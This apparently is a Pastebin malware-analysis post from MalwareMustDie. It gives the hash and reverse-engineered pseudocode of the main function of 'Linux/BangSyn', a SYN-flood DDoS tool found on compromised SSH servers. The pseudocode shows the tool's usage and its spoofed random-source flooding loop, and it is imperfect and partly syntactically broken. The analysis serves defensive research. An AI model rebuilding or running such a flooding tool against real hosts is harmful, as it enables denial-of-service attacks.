Advertisement
MalwareMustDie

Linux/BangSyn (made in China)

Apr 19th, 2014
2,984
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 125.24 KB | None | 0 0
  1. Linux/BangSyn (made in China)
  2.  
  3. This is a command-line DDoS SYN packet tool, spotted at hacked SSH servers.
  4.  
  5. hash: 20112a6c0cd7e85e07d0ce385ec37bcd
  6. (Sample I downloaded to VT)
  7.  
  8. reversing result for main fnc:
  9.  
  10. main(arg1, arg2)
  11. {
  12. time(timer);
  13. var00 = arg2;
  14. var11 = 80;
  15. var13 = 1000;
  16. var14 = atof(*(const char)(arg2 + 24));
  17. if ( arg1 <= 1 )
  18. {
  19. printf("syntax: ./bangsyn ip port time \n", *(arg2);
  20. exit(0);
  21. }
  22. var10 = host2ip(*(arg2 + 8));
  23. if ( arg1 > 2 )
  24. var11 = atoi(*(const char)(arg2 + 16));
  25. if ( arg1 > 3 )
  26. var13 = atoi(*(const char)(arg2 + 24));
  27. if ( !v11 )
  28. var11 = 80;
  29. if ( !v13 )
  30. var13 = 1000;
  31. puts("\nsantong syn: ");
  32. printf("IP: %s\n", *(arg2));
  33. printf("Port: %u\n", var11);
  34. printf("Seconds: %d\n\n", var13);
  35. var15 = 0.0;
  36. while ( v14 >= (double)(time(0) - timer[0]) )
  37. {
  38. var6 = rand() * 255.0 / 2147483648.0) + 1;
  39. var7 = rand() * 255.0 / 2147483648.0) + 1;
  40. var8 = rand() * 255.0 / 2147483648.0) + 1;
  41. var9 = rand() * 255.0 / 2147483648.0) + 1;
  42. var12 = 80;
  43. sprintf(&s, "%d.%d.%d.%d", var6, var7, var8, var9);
  44. var5 = host2ip(&s);
  45. dosynpacket(var5, var10, var11, var12);
  46. var15 = var15 + 1.0;
  47. }
  48. return printf("\nPackets Sent: %d \n", var15);
  49. }
  50.  
  51. @unixfreaxjp #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement